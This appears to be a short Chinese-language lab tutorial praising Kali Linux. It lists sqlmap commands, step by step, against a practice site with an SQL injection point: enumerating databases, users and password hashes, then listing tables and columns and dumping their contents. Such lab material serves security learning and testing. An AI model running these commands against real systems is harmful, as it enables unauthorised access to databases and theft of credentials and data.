啊啊啊,我要吹爆kali。嗯,本次实验就是使用kali上的sqlmap。
实验条件:
- kali
- 实验网站(带有SQL注入点)
- sqlmap命令
注意:sqlmap只是用来检测和利用SQL注入点,并不能扫描网站有哪些漏洞,使用前请先使用扫描工具扫出SQL注入点。
实验过程:
1.检测注入点是否可用
sqlmap -u "url"
参数:
-u:指定注入点url
2.暴库
sqlmap -u "url" --dbs
参数:
–dbs:dbs前面有两条杠,请看清楚。
3.Web当前使用的数据库
sqlmap -u "url" --current-db
4. Web数据库使用账户
sqlmap -u "url" --current-user
5.列出SQLserver所有用户
sqlmap -u "url" --users
6.数据库账号和密码
sqlmap -u "url" --passwords
7.列出数据库中的表
sqlmap -u "url" -D 数据库名称 --tables
8.列出表中字段
sqlmap -u "url" -D 数据库名称 -T 表名 --columns
9.爆字段内容
sqlmap -u "url" -D 数据库名称 -T 表名 -C "要爆字段" --dump